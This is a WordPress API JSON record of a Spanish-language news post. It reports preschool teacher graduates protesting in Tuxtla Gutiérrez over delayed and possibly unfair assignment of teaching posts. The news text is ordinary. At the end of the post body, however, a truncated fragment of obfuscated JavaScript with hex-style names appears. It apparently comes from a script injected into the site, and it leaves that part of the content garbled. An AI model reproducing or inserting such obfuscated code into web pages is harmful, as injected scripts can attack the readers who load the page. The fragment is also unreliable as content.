{"id":20215,"date":"2025-02-05T03:15:30","date_gmt":"2025-02-05T03:15:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20215"},"modified":"2025-02-05T03:15:31","modified_gmt":"2025-02-05T03:15:31","slug":"normalistas-piden-liberacion-de-plazas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20215","title":{"rendered":"Normalistas piden liberaci\u00f3n de plazas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250204-WA0020-1024x765.jpg\" alt=\"\" class=\"wp-image-20216\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250204-WA0020-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250204-WA0020-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250204-WA0020-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250204-WA0020-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250204-WA0020.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>4 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Un grupo de egresadas de diferentes normales del estado, dieron a conocer que desde el mes de mayo presentaron el examen para acceder a este beneficio pero no han sido tomadas en cuenta.<\/p>\n\n\n\n<p>Por este motivo realizaron una protesta en el centro de Tuxtla Guti\u00e9rrez para exigir la agilizaci\u00f3n de este tr\u00e1mite y los espacios laborales sean otorgados.<\/p>\n\n\n\n<p>Se\u00f1alaron que las autoridades les han dado largas durante varios meses por ello han tomado esta acci\u00f3n para exigir la agilizaci\u00f3n de este tr\u00e1mite.<\/p>\n\n\n\n<p>\u201cNosotras somos maestras de educaci\u00f3n preescolar, y pedimos que se nos otorguen las plazas docentes, ya que, hasta el momento han otorgado 90 plazas hasta el momento, y el a\u00f1o anterior en este mismo periodo hab\u00edan entregado un n\u00famero mayor\u201d, manifestaron.<\/p>\n\n\n\n<p>Las manifestantes expresaron su preocupaci\u00f3n ya que, existe la sospecha que las plazas est\u00e1n siendo entregadas a conveniencia.<\/p>\n\n\n\n<p>\u201cSomos representantes de al menos cien maestras de todo el estado y hemos cubierto interinatos para tener un sustento que nos permita cubrir nuestros gastos. Hay casos de compa\u00f1eras que llevan tiempo dando clases y no les dan ya un espacio laboral fijo\u201d, indicaron.<\/p>\n\n\n\n<p>Por ello, la petici\u00f3n es que esta asignaci\u00f3n se haga con la mayor transparencia posible, \u201cmuchas viajamos desde nuestro lugar de origen para manifestarnos en la capital chiapaneca\u201d.<\/p>\n\n\n\n<p>Recordaron que la semana pasada en dos ocasiones intentaron sostener un encuentro con funcionarios de la Secretar\u00eda de Educaci\u00f3n pero no fueron recibidas.<\/p>\n\n\n\n<p>\u201cEntregamos un documento donde pedimos una explicaci\u00f3n sobre la asignaci\u00f3n de las plazas docentes. Nosotras hemos cumplido con todos los tr\u00e1mites, hemos llevado cursos, hemos presentado el examen y todo esto genera un costo, y el hecho de que no nos digan qu\u00e9 va pasar cuando ha salido ya una nueva convocatoria es injusto\u201d, se\u00f1alaron.<\/p>\n\n\n\n<p>En este escenario sentenciaron que continuar\u00e1n con las protestas en caso de que esta petici\u00f3n no sea atendida.<\/p>\n\n\n\n<p>\u201cNo es justo que nos exijan tanto, hemos tomado los cursos que nos piden y no nos han dado las plazas\u201d, remarcaron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 4 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Un grupo de egresadas de diferentes normales del estado, dieron a conocer que desde el mes de mayo presentaron el examen para acceder a este beneficio pero no han sido tomadas en cuenta. Por este motivo realizaron una protesta en el centro de Tuxtla Guti\u00e9rrez para exigir &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20216,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20215","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20215"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20215\/revisions"}],"predecessor-version":[{"id":20217,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20215\/revisions\/20217"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20216"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}